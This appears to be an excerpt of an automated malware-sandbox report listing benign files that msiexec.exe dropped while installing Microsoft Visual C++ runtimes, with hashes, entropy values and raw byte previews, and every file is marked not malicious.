                                                                        Preview:...@IXOS.@.....@a|"V.@.....@.....@.....@.....@.....@......&.{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6};.Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702..vc_runtimeMinimum_x64.msi.@.....@6l...@.....@........&.{5A9DDDD3-76A3-46B4-95D5-90B8CD9429D8}.....@.....@.....@.....@.......@.....@.....@.......@....;.Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{36F68A90-239C-34DF-B58C-64B30153CE35}....&.{5A9DDDD3-76A3-46B4-95D5-90B8CD9429D8}c.&.{36F68A90-239C-34DF-B58C-64B30153CE35}............ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}&.{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}..&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}...@.....@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}&.{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}..&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}...@.....@......&.{03C

                                                                        C:\Windows\Installer\MSIE359.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):9598
                                                                        Entropy (8bit):5.687525568223914
                                                                        Encrypted:false
                                                                        SSDEEP:96:mLpZpygqZpN050hkbX7EdgEnUygtE8M8M8M8M8M8M8M8M8M8M8VKW40QyfUV5evP:aBmYTNl7bMVGTbheRaWm
                                                                        MD5:20A919E955A32FF6928028D87C0BA56E
                                                                        SHA1:B125BEE19819ABEAE5D95DCC39B4BB88C5A2E237
                                                                        SHA-256:C14527E55B639094BAC049A28EE9ABECE57186F8675287586830F496D03B092B
                                                                        SHA-512:0A2E8464D4A17CEA2093F5D1B51597A7733049F804491B12BFB79CAADBEA8C75C9C5B5281F89D254F2F93D9D077D2EB445671724E90EFCF036FBEBBC1CDFDF63
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@b|"V.@.....@.....@.....@.....@.....@......&.{CF4C347D-954E-4543-88D2-EC17F07F466F};.Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931..vc_runtimeMinimum_x64.msi.@.....@.|"..@.....@........&.{F4326D14-4FF5-4F81-B678-481B19EBBB51}.....@.....@.....@.....@.......@.....@.....@.......@....;.Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}@.02:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64\Version.@.......@.....@.....@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}@.22:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64\Version.@.......@.....@.....@......&.{B33258FD-750C-3B42-8BE4-535B48E97DB4}$.C:\Windows\system32\vcruntime140.dll.@.......@.....@.....@......&.{2427B123-F132-4F0B-A958-50F7CDFCAA56}&.C:\Windows\system32\vcrunti

                                                                        C:\Windows\Installer\SourceHash{CF4C347D-954E-4543-88D2-EC17F07F466F}

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.2061864215682299
                                                                        Encrypted:false
                                                                        SSDEEP:12:JSbX72FjDkXAlfLIlHuRpZhG7777777777777777777777777ZDHFsmgsaQ48QGE:JAUIwElgsvxpcF
                                                                        MD5:8EE1FF2CF76B68952EE84ECE42A7C20C
                                                                        SHA1:E6D7C3B46F3FD41570D287625C8CB78A8A85C375
                                                                        SHA-256:05AF8BE6241B58D1346ACD034150A4BA93382E28F82ECA0553EA1215DDE40368
                                                                        SHA-512:5E92A7A0CA1069026C9E211D417DE8E3FBDE117B362BE0866374E19AE1336CAC452D9D050F8A818523403225493D41BE0E0BB02253F4F544F8C71EFF4A6103E7
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Installer\SourceHash{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.2078711284846801
                                                                        Encrypted:false
                                                                        SSDEEP:12:JSbX72FjxcXAlfLIlHuRpWBhG7777777777777777777777777ZDHFTVdMceFBJJ:J2UIwUi5venJCcF
                                                                        MD5:136F9CB4226201D8EEBA93142158B9A8
                                                                        SHA1:1266049C705C2682555F6B2FFDFC3A213500E3EF
                                                                        SHA-256:C55C342A42F8A3C7A509289A68CDB1E433375FD88EAF93B0A2030819A2600AE8
                                                                        SHA-512:793A12ACF7C96A3D215F8C45AB6D4B4013BC49C446E7028E0EF339136A1A8373DBDA7F40D792F539AFD3FA99F75D9FE44933E3F76CBE2C84D1A3F5EE51423B17
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5638666227546747
                                                                        Encrypted:false
                                                                        SSDEEP:48:x8PhruRc06WXi7FT5XhdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:Mhr11FTd8aLVL3zyREfJoZMc
                                                                        MD5:01077FAD9CBC96BD8733EEF5BC7C3E9A
                                                                        SHA1:48C3949FEF321FE01B49CF2766FD22EC6F4A4B92
                                                                        SHA-256:7A60B5E0B869C6A9BC222DE88D686151CC4BF8D39054648E5E6C7835BA6020F2
                                                                        SHA-512:12E7FE05916FE420EF9138CA152D0CBE79E9677475E68A45DD41AC0F60EE97ECA0417596E6259E27B70D5872391A70C373374479F6E20B64C9BECE822D50623C
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):120125
                                                                        Entropy (8bit):5.369060473273418
                                                                        Encrypted:false
                                                                        SSDEEP:768:NSXZf5Y2mhq+Lswt33IyCr7el3OEmSoay55QIxVV9lQ2es9YU/tYcxywq9D+crL0:NSc2mhbT1pAcuY8
                                                                        MD5:69D65D00525992B804A44984863AD86A
                                                                        SHA1:8441EE9F10AFC26C8C30D2359C43F81626684FBA
                                                                        SHA-256:17378F96225F66C7D0122838135785B87F3DE6E8A190659352F3706B52ECC5BB
                                                                        SHA-512:8444CE34FFE30D4114B8D0ADA812A7DB29B61D677FECB6F8A1BDFE1941B28AE683E0AE9F5788DBC361939316C4AFEFAB5EC306393B67DA2F152451F640AB028F
                                                                        Malicious:false
                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 11:01:16.006 [3252]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:16.021 [3252]: ngen returning 0x00000000..07/23/2020 11:01:16.068 [1236]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:16.084 [1236]: ngen returning 0x00000000..07/23/2020 11:01:16.131 [4512]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Excel.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 1

                                                                        C:\Windows\System32\concrt140.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):327504
                                                                        Entropy (8bit):6.355017459054054
                                                                        Encrypted:false
                                                                        SSDEEP:6144:NVb1XM3VzY+Ug3yxpzrxIQVpJOWvYGCs8yFnWzghIGAu428z:jBc3VYZxxrxq9ze47z
                                                                        MD5:C11DC6779E2DC5A4620FBE1BF306D720
                                                                        SHA1:04DEA1CBBAB2A939578544056EB7818E9D7CD3CB
                                                                        SHA-256:0CE53545B7D6E1FE5451DF4822D3D59B6806C00D0C69C0813E7A4EFC2CF92A86
                                                                        SHA-512:C1E422E42825BBCDDD2E8A73204B23AEAEC2520E882B8583347B925A4695151998BA96798FDF68F2A5838B985FC230A3DCD254A8EAFC43704E6190A612992C6D
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-..lii.?ii.?ii.?...>ki.?`..?ci.?&..>ni.?ii.?.i.?&..>ai.?&..>mi.?&..><i.?&..>hi.?&.s?hi.?&..>hi.?Richii.?................PE..d....@............" ..."............................................................l.....`A.............................................M...+...................6......PO......x...p5..p...........................04..@............................................text...\........................... ..`.rdata...M.......N..................@..@.data....@...@...:..................@....pdata...6.......8...h..............@..@.rsrc...............................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\mfc140.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5625152
                                                                        Entropy (8bit):6.746793773162767
                                                                        Encrypted:false
                                                                        SSDEEP:49152:6ORAY4XUjURKpEaGKgTPiNHtkHqYF95zExbVLE1pf8s7CT1u+wvqPDne4vpR6uSz:prVpHqvKnfJeFLOAkGkzdnEVomFHKnPY
                                                                        MD5:A0372BFFC29E5FE5F07969154E713210
                                                                        SHA1:706AA77C117C8B1D8D510A5A29D05FCD1E33EA21
                                                                        SHA-256:0F0803E6355698D992AD257853577D60E064D55BF570B9B8B299315E8C6088E4
                                                                        SHA-512:0FE574C6B199C04F323EBF37D599A79F2A953AA3F1F19512679D7B5D0EFC18074CFDED54B6D762D019B8AA6134FA60342793C53D42250A9750B7563AF3B4A88A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}v.d.%.d.%.d.%!..$.d.%!..$.d.%!..$.d.%...%.d.%...$.d.%...$.d.%!..$.d.%.d.%.`.%...$.d.%...$.d.%...$he.%...$.d.%...%.d.%...$.d.%Rich.d.%................PE..d...-............." ..."..,...(.......,...................................... V.......U...`A.........................................L:.d...T(;.......?.`.....<..6....U.@O....T. o...L5.p............................@..@.............-..... 9:......................text...l.,.......,................. ..`.rdata...~....-.......,.............@..@.data....4....;......r;.............@....pdata...6....<..8...@<.............@..@.didat..H.....?......x>.............@....rsrc...`.....?......~>.............@..@.reloc.. o....T..p....T.............@..B................................................................................................................................................................................

                                                                        C:\Windows\System32\mfc140chs.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):51016
                                                                        Entropy (8bit):6.301194450733097
                                                                        Encrypted:false
                                                                        SSDEEP:768:jdzvsXMQ9tLkr8yTby97DVL4HdRmuU9z1kKXRmuU9z7NT:hz0XMQ9tLU8CbyBVLS3d8z1bBd8z79
                                                                        MD5:F048B2C27FB6B2E1C076A29978CF1B95
                                                                        SHA1:D3CF168D1D0C707F4B73063AB0883B0981FE7E4E
                                                                        SHA-256:6DCE3907366FF863B06AEBE3B6D15B660E021E202982C8ACD92BBBF76BEB59A1
                                                                        SHA-512:37A6090C1BC1D2136E8C5FD265438025970CC048837B148F62AE7236A0B100058CB646957E9E74A60C0A08187DFC9526C4F3359376056CFFEAB7FBFE3087EFBC
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d.....(..........." ...".....v............................................................`A......................................................... ...s...........x..HO..............p............................................................................rdata..t...........................@..@.rsrc....s... ...t..................@..@......(.........X.................(.........l.................(.........$...L...L.........(.............p...p...........................RSDS.0^....N.]..4......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140CHS.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1...a...rsrc$02.... ....0^....N.]..4..K\......0.7..(.........................................................................................................................

                                                                        C:\Windows\System32\mfc140cht.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):51024
                                                                        Entropy (8bit):6.340536874095089
                                                                        Encrypted:false
                                                                        SSDEEP:768:VLfucVI4qc7kYw4JUM3i/EhWfHklkrRmuU9zlmKiRmuU9z3Z:lucVI4qc4YJUM3XhWPqk1d8zfMd8zJ
                                                                        MD5:AA67075052FC3EEA447B9F6AEFB819E4
                                                                        SHA1:2ED81FD56E9BBBC1FF4E3B94814C596F2CE9AD3B
                                                                        SHA-256:4C8D2A09D2E54A7BE08EE75CC10A64ECF606F21102DD9EAB6F8DABE9492B4E80
                                                                        SHA-512:14025A6E1932C91F3CBBBEFBEF810A41E34F6C9BAB6CC31D8BDEC62E73DA6581098FE3FD52B82FBF0B87F089B34D14EA1F1BD7A7BFDEC6ACF4F24065B31C34ED
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...g'z..........." ...".....v...........................................................`A......................................................... ..8s...........x..PO..............p............................................................................rdata..t...........................@..@.rsrc...8s... ...t..................@..@....g'z.........X...............g'z.........l...............g'z.........$...L...L.......g'z.............p...p...........................RSDS.$.>...DU..T.Q.....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140CHT.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1...a...rsrc$02.... ....$.>...DU..T.Q...Q._.H..n.g'z.........................................................................................................................

                                                                        C:\Windows\System32\mfc140deu.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):79696
                                                                        Entropy (8bit):4.975420142902263
                                                                        Encrypted:false
                                                                        SSDEEP:1536:/VPidQr0UZqnn0BDn9PS6VFaGCWKZ+e0petNSaBhp0vcsjsr8gWb8C1dCuf9tcz+:/VidQr0UZqnnSn9PS6VFaGCWKZX0Whpk
                                                                        MD5:39B93D80438E8502EF6BFFFE7A3E90C0
                                                                        SHA1:4EC67C81D7E07E26A785D554F0C04F2560E09BCA
                                                                        SHA-256:2F0E08B7C4F5EF6B2EB3D447385C5E8B5B05AE4897993DC4CB79188B1EC3300A
                                                                        SHA-512:58670741FC42EF0DE3FF54B16533C4217610C809AE8EADD3D3605261286C18DEEB7252751517FE1F3A6B1503BC3C33C88A7CBE10242B018E3AF4ADBD1045CAF1
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d.....f..........." ..."............................................................e.....`A......................................................... ..0...............PO..............p............................................................................rdata..t...........................@..@.rsrc...0.... ......................@..@......f.........X.................f.........l.................f.........$...L...L.........f.............p...p...........................RSDS.....1\....u}......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140DEU.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02.... ........1\....u}../...:;!4f5t...f.........................................................................................................................

                                                                        C:\Windows\System32\mfc140enu.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):69968
                                                                        Entropy (8bit):5.131704941361196
                                                                        Encrypted:false
                                                                        SSDEEP:768:wUVGijcBEhCgy6rAu1HLPLNqyf/nWHBNhdBU2fd5gH8UHg9zG2KPj8g9zGI:/V9zfy6rAuhPLNXf/nWHNfdo8/z6PzZ
                                                                        MD5:F93CC93C178EE0D0DCEC72B6590837B7
                                                                        SHA1:D850AA17E90EAA85505B01191B9B4012CDF37DE6
                                                                        SHA-256:2368B5905DF1D205C956EC94594491241C2B83FD0D22928DFBE1CE7B1657ABE2
                                                                        SHA-512:623BEF9CE6A83A2576CF32E620767AD7DBC8A5C04C48D896B436F60D4A34D56BB44514079AFD6F1580018791D486EE5102C329682F9372AFA514232A4002F209
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...-..w.........." ..."..................................................................`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@....-..w........X...............-..w........l...............-..w........$...L...L.......-..w............p...p...........................RSDS.(..[......(.......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ENU.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1..0....rsrc$02.... ....(..[......(...D..>........-..w........................................................................................................................

                                                                        C:\Windows\System32\mfc140esn.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):78672
                                                                        Entropy (8bit):4.95404690674315
                                                                        Encrypted:false
                                                                        SSDEEP:1536:gwq6A16B/iKuFm3OKWxRZ/I2+f9Xzu16ttf9Xzut:gwc8B/+HIZf9X4ctf9Xy
                                                                        MD5:7AB83D5CFE5E24FA6ACFD110E2F3DCC7
                                                                        SHA1:F5E7110333D6EEDC511E815FE6DE39856D5F60B9
                                                                        SHA-256:93B2599549721C004A30857A6E105F60CFE3057230109F3B8D1C6CE2C520ADEF
                                                                        SHA-512:936AD912A2219278F490855C68CBAB7C7962CE42D6110603EDFCC5645A7AA8308B3BB84B145E3F75CCC0DBCA62684001D3FDE40484FD593E3B991CCE86EFB3EA
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d......4.........." ...".............................................................!....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@.......4........X..................4........l..................4........$...L...L..........4............p...p...........................RSDST9<B{.i.Wc-.gX.,....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ESN.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1..`....rsrc$02.... ...T9<B{.i.Wc-.gX.,...I.F.w._U...4........................................................................................................................

                                                                        C:\Windows\System32\mfc140fra.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):79696
                                                                        Entropy (8bit):4.957571682646658
                                                                        Encrypted:false
                                                                        SSDEEP:768:926iNYajZELeWYFmNRYxAaTafCp5eQYZmZUjyyyyyyyyyyyyyyyUGQFUbWTVNeTO:9NuqLeW6A2SCHu0jhFzVRzw
                                                                        MD5:B0924A9F3FF2CED936E94AC2DA338CFA
                                                                        SHA1:AD48A45145FAFBAAF450B5DB1378B2B96598EC51
                                                                        SHA-256:06220647576FDB763B9EFC20581EF8A561654F1E6E60B394937B1D2877DBC011
                                                                        SHA-512:AF647F77351A6D1968585627B84C01E9AB3E6B65CB8985F13F0B8586DF912BCBABEACA0FB93C96D302181BBCBA07A80928C39F68B51C6A517DA4560B197DC661
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...Y............" ...".............................................................S....`A......................................................... ..x...............PO..............p............................................................................rdata..t...........................@..@.rsrc...x.... ......................@..@....Y..........X...............Y..........l...............Y..........$...L...L.......Y..............p...p...........................RSDS.$....b..1#'.......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140FRA.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02.... ....$....b..1#'....E..+.OL)RX.Y..........................................................................................................................

                                                                        C:\Windows\System32\mfc140ita.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):77648
                                                                        Entropy (8bit):4.9589173959336685
                                                                        Encrypted:false
                                                                        SSDEEP:768:hRE6XaCyqbK15M8zwgDGxNIlW3jSCQQQjeqS1hDDg1UWTV8Hkhg9zGDMKvg9zGQ:hnass5M8zwgSxNIlW3GoiTwTzATQz
                                                                        MD5:0B6D7C89EBA8609F9B877CDDB875AB00
                                                                        SHA1:34FA8C4B62BF7E0A12E0C94E9BB8B49F7A78E317
                                                                        SHA-256:B74B0BF88316ADDE2AA8D1455AE9BFA9762D6F7093F8239BEF44D5A802AB2518
                                                                        SHA-512:0BC4A5D5483D4C51CF50254B39107B049B7B92CCE5561456F4524FBD0972C1D85CE4D1F1DEC81772D66D1090D4BFBE4729E0C9004629A760A07C76D66365CE72
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d....X............" ..."............................................................S+....`A......................................................... ..X...............PO..............p............................................................................rdata..t...........................@..@.rsrc...X.... ......................@..@.....X..........X................X..........l................X..........$...L...L........X..............p...p...........................RSDS.@..4...5.+.R.V.....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ITA.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02.... ....@..4...5.+.R.V.a...8...P<-.X..........................................................................................................................

                                                                        C:\Windows\System32\mfc140jpn.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):58704
                                                                        Entropy (8bit):6.138297075618846
                                                                        Encrypted:false
                                                                        SSDEEP:768:DanVn/7RfJxsr10/eu9RHreDHYMufiC9zuAbK9MufiC9zue:mnp/7RgunIYVzu39Vzue
                                                                        MD5:8778C8D55C6801171CF2D7161D9D2608
                                                                        SHA1:6875E6B9493D678A384379F8425D6C274E32C378
                                                                        SHA-256:D3BD3C71EC44D51A8F341CA43981A2A32B388DF7A2BBD81C996B97CD4C4E1E1D
                                                                        SHA-512:1111A598441F657DD887150C1D9152A971C3728E4A1DC9C85C249A91143C20E918CB9E0902E0647B9260E6CC150360387EFE14602CEAAC5C6DCFCBB56408F494
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d....-............" ..."............................................................t.....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@.....-..........X................-..........l................-..........$...L...L........-..............p...p...........................RSDS4....iQZ....5pn....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140JPN.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1..p....rsrc$02.... ...4....iQZ....5pn..r.s.....O.-..........................................................................................................................

                                                                        C:\Windows\System32\mfc140kor.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):58192
                                                                        Entropy (8bit):6.2590221802837
                                                                        Encrypted:false
                                                                        SSDEEP:768:VTQO54LQTNlwUaHqNA3B2I7Cvq/HfJMufiC9zuOK5eMufiC9zufl:Vr51TNlqqNAx2I7CvqvfJVzutUVzufl
                                                                        MD5:17C5AA7148D32622073DBEB124DD7208
                                                                        SHA1:25DB38CE00E4CFC6D4204730955902D38A8DEDCF
                                                                        SHA-256:4D148066E9D361ECCDB6E3245A55164B9FEA2533431EF28F6B431D6ED9F3CA4C
                                                                        SHA-512:47F03C541FE62815DD1ADCC41C04D5F9CB3C0B9A70825A15E87479F9644E513FBFAAA0675B470BBE68D457140AEEDDB5A0579C0AC44C41AAC75132CC7369D65A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d....]............" ...".............................................................Y....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@.....]..........X................]..........l................]..........$...L...L........]..............p...p...........................RSDS.......h...^0w......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140KOR.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1...~...rsrc$02.... ..........h...^0w..#....A@R.....]..........................................................................................................................

                                                                        C:\Windows\System32\mfc140rus.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):75600
                                                                        Entropy (8bit):5.490211431615378
                                                                        Encrypted:false
                                                                        SSDEEP:768:/v/gFXOvULiqNWTMHVhtZgFckD9AHkIRmuU9zCHKlRmuU9zhY:f6XOvURhTWckad8zCqPd8zhY
                                                                        MD5:750C7DA20713AC9D54917511B0A25008
                                                                        SHA1:9C65E14D7CD5B76ABBB0BF375EFE14DB25404771
                                                                        SHA-256:E3E959FC260BC6707641645CE84057893F166984FA18324008DB39E4132C5A06
                                                                        SHA-512:C9785A35C024853D6055E8D97754465373D62D486C09F428BCF2E6DF973F360C6991ECC840819CD3C34DB0BD83D42CA28A0DC2C0CF7980B1283B634A517EBDD0
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...B.l..........." ...".............................................................~....`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@....B.l.........X...............B.l.........l...............B.l.........$...L...L.......B.l.............p...p...........................RSDS#..7tr...[...5~r....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140RUS.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.. ....rsrc$02.... ...#..7tr...[...5~r.....'/..>..B.l.........................................................................................................................

                                                                        C:\Windows\System32\mfc140u.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5658960
                                                                        Entropy (8bit):6.7350057529257
                                                                        Encrypted:false
                                                                        SSDEEP:98304:SPjBNrNGV+cJHdFLOAkGkzdnEVomFHKnP+:ONMYudFLOyomFHKnP+
                                                                        MD5:0F3BCCC38502C5543C02266E6E62B738
                                                                        SHA1:4C5EB318EEEA2C208E6931178D3CC5B1D59C4E2B
                                                                        SHA-256:BC9EB4F2C8A8E9F1AB4CF67B935BBE13E5FE456FAA8B9E1D486EF81C27C4D810
